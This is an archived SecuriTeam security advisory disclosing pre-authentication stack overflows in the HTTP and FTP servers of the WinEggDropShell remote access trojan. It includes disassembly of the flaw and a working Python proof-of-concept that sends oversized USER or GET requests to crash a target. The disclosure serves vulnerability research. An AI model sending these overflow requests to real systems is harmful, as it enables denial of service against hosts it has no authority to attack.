The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
WinEggDropShell Multiple Remote Stack Overflows
------------------------------------------------------------------------
SUMMARY
WinEggDropShell is a popular Chinese remote access trojan. WineggDropShell
provide HTTP Proxy/Socks Proxy/HTTP Server/FTP Server.
Multiple pre-authentication stack overflow found in the HTTP/FTP server
provided by WinEggDropShell, which can be used to execute arbitrary
command or denial of service.
DETAILS
Vulnerable Systems:
* WinEggDropShell Eterntiy version 1.7 (other versions suspected)
FTP USER buffer overflow:
text:100027BD push offset aUser ; "USER"
text:100027C2 call _strlen
text:100027C7 add esp, 4
text:100027CA lea edi, [ebp+eax-103h]
text:100027D1 push edi
text:100027D2 push offset aS ; "%s"
text:100027D7 lea edi, [ebp+var_208]
text:100027DD push edi ; char *
text:100027DE call _sprintf ; emmmmm, ;)
_ReceiveSocketBuffer can maximum recv 0x200h, but [ebp+var_208] is a
0x104h buffer.
FTP Server Pass Command:
Same ?
HTTP GET stack overflow:
GET /A*260
Exploit:
# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC
# HTTP Server "GET" && FTP Server "USER" "PASS" command
# Bug Discoverd and coded by Sowhat
# Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
# http://secway.org
# 2005-10-11
# Affected:
# WinEggDropShell Eterntiy version
# Other version may be vulnerable toooooo
import sys
import string
import socket
if (len(sys.argv) != 4):
print
"##########################################################################"
print "# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC
#"
print "# This Poc will BOD the vulnerable target
#"
print "# Bug Discoverd and coded by Sowhat
#"
print "# http://secway.org
#"
print
"##########################################################################"
print "\nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Port\n"
print "Example: \n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80"
print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21"
sys.exit(0)
host = sys.argv[2]
port = string.atoi(sys.argv[3])
if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")):
request = "USER " + 'A'*512 + "\r"
if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")):
request = "GET /" + 'A'*512 + " HTTP/1.1 \r\n"
exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.connect((host,port))
exp.send(request)
ADDITIONAL INFORMATION
The information has been provided by <mailto:smaillist@gmail.com> Sowhat.
The original article can be found at:
<http://secway.org/advisory/AD20051202.txt>
http://secway.org/advisory/AD20051202.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
